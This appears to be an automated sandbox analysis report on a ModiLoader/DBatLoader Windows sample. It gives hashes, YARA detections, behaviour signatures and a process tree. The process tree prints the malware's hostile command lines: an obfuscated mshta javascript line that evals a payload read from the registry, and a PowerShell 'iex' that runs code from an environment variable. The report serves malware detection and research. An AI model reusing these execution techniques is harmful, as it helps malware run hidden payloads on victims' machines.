Analysis
- max time kernel: 142s
- max time network: 162s
- platform: windows10-2004_x64
- resource: win10v2004-20220812-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 04/10/2022, 01:27
Static task: static1
Behavioral task: behavioral1
- Sample: b4b2e6ec0267e86d67f98579945dab90f08608d6248db8340b6a95ae86813226.exe
- Resource: win7-20220901-en
Behavioral task: behavioral2
- Sample: b4b2e6ec0267e86d67f98579945dab90f08608d6248db8340b6a95ae86813226.exe
- Resource: win10v2004-20220812-en
General
- Target: b4b2e6ec0267e86d67f98579945dab90f08608d6248db8340b6a95ae86813226.exe
- Size: 350KB
- MD5: 33e4035e409d8b1f24f6dbb42fbac637
- SHA1: b1f91d896bf59b434cc164ea8dd440a82edbb543
- SHA256: b4b2e6ec0267e86d67f98579945dab90f08608d6248db8340b6a95ae86813226
- SHA512: 7a68fe0be6e4ff29de7d9e563ddd3506d30a84fc76e1b57cc382db9043d54b44a5d61ad90352f1e8a957bc4b707e89584711ebfcbee926eed5d6a7df4002e08d
- SSDEEP: 6144:vZFPzNJtUTidCOKQzHaHXrFnk8iEgxeBgOCF+dg384dyzKX/GUaokGd:vvPzNJtUTidCMa3Rnk8iHxeBcggdszKh
Malware Config
Signatures
- ModiLoader, DBatLoader
  ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
- Process spawned unexpected child process (1 IoCs)
  This typically indicates the parent process was compromised via an exploit or macro.
  description | pid | pid_target | Process | procid_target
  Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 1044 | 4864 | mshta.exe | 83
- ModiLoader Second Stage (3 IoCs)
  resource | yara_rule
  behavioral2/memory/4208-133-0x0000000000400000-0x000000000045D000-memory.dmp | modiloader_stage2
  behavioral2/memory/4208-134-0x0000000002900000-0x00000000029C0000-memory.dmp | modiloader_stage2
  behavioral2/memory/4208-145-0x0000000002900000-0x00000000029C0000-memory.dmp | modiloader_stage2
- Checks computer location settings (2 TTPs, 1 IoCs)
  Looks up country code configured in the registry, likely geofence.
  description | ioc | Process
  Key value queried | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation | mshta.exe
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  pid | Process
  4168 | powershell.exe
  4168 | powershell.exe
- Suspicious use of AdjustPrivilegeToken (1 IoCs)
  description | pid | Process
  Token: SeDebugPrivilege | 4168 | powershell.exe
- Suspicious use of WriteProcessMemory (3 IoCs)
  description | pid | Process | procid_target
  PID 1044 wrote to memory of 4168 | 1044 | mshta.exe | 85
  PID 1044 wrote to memory of 4168 | 1044 | mshta.exe | 85
  PID 1044 wrote to memory of 4168 | 1044 | mshta.exe | 85
Processes
- C:\Users\Admin\AppData\Local\Temp\b4b2e6ec0267e86d67f98579945dab90f08608d6248db8340b6a95ae86813226.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\b4b2e6ec0267e86d67f98579945dab90f08608d6248db8340b6a95ae86813226.exe"
  PID: 4208
- C:\Windows\system32\mshta.exe
  Command line: "C:\Windows\system32\mshta.exe" javascript:zlNt0U4zqT="xOYUjE4QI";l6m=new%20ActiveXObject("WScript.Shell");gDgJkL96FL="ENF7g0h";QsI5F9=l6m.RegRead("HKLM\\software\\Wow6432Node\\6c11Ci\\wnsWfoW9");yxTzAi49K="B8e";eval(QsI5F9);MYLbfQ35x="BZI";
  - Process spawned unexpected child process
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID: 1044
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (child of PID 1044)
    Command line: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:tcej
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID: 4168